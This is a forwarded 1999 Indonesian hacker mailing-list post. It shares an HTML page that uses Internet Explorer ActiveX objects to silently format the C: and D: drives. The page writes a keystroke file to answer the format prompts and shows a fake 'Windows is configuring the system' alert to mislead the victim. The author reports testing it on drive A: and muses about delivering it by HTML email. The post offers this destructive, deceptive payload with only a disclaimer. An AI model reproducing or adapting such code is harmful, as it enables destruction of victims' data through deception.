-------Original Message-----
From: Irwan Hadi <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED] <[EMAIL PROTECTED]>
Date: 01 September 1999 6:16
Subject: [ Hackerlink ] Fwd: [cybercrime-alerts] Digest Number
27
>> Topics in today's digest:
>>
>> 1. Internet Explorer code that formats local drives
>> From: [EMAIL PROTECTED]
PERHATIAN: RESIKO COBA-COBA TERHADAP SOURCE CODE DIBAWAH INI
BUKAN TANGGUNGJAWAB PENULIS!
Produk M$ memang heboh! Saya coba memodifikasi dari source yang
ada menjadi HTML spt dibawah ini:
== BEGIN HTML CODE ======
<html><head></head><body>
<object id="wss"
classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<object id="sfso"
classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<script language="JavaScript">
sfso.CreateTextFile('c:\y.txt', true).WriteLine('y');
wss.Run('command /c format c: /u < y.txt', 6);
wss.Run('command /c format d: /u < y.txt', 6);
alert('IMPORTANT: Windows is configuring the system. Plase do
not interrupt this process.');
</script>
</body></html>
== END HTML CODE ======
Memang masih ada User-Intervention, karena pada saat akan
meng-execute ActiveX/OLE Automation IE akan memberikan
konfirmasi terlebih dahulu, tetapi setelah itu berlangsung di
background-process tanpa User-Intervention. DOS Command seperti
DELTREE, FORMAT, FDISK dan lain-lain memang membutuhkan input
dari user, tapi hal tersebut bisa 'dikibuli' dengan membuat
suatu TextFile kecil yang berisi tombol-tombol yang akan kita
tekan. Saya memang belum mencoba benar-benar jika untuk
memformat C: atau D: (siapa yang mau???), tapi kalo Drive A:
memang benar-benar diformat! Saya juga belum mencoba menaruh
code tsb. di e-mail HTML, jalan apa nggak?
Bahan2 yang terlibat selain IE4 dan Win98 adalah sbb:
1. Microsoft Scripting Runtime
(C:\WINDOWS\SYSTEM\SCRRUN.DLL)
[Class: FileSystemObject]
di sini berisi 'sekoper' Command untuk bikin file, scan
direktori, men-scan seluruh drive yang ada, mengambil Volume
Label, CopyFile, MoveFile, Nulis ke file, dll.
2. Windows Scripting Host Object Model
(C:\WINDOWS\SYSTEM\WSHOM.OCX) nah, ini yang bisa nge-Run
command.
*Kalau sakit dicubit jangan mencubit
kalau sakit diformat jangan memformat*
Syarif Lumintarjo
[EMAIL PROTECTED]
[EMAIL PROTECTED]
ICQ# 17357739
milis ini didukung oleh :
>> http://www.indolinux.com - dunia linux indonesia
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]
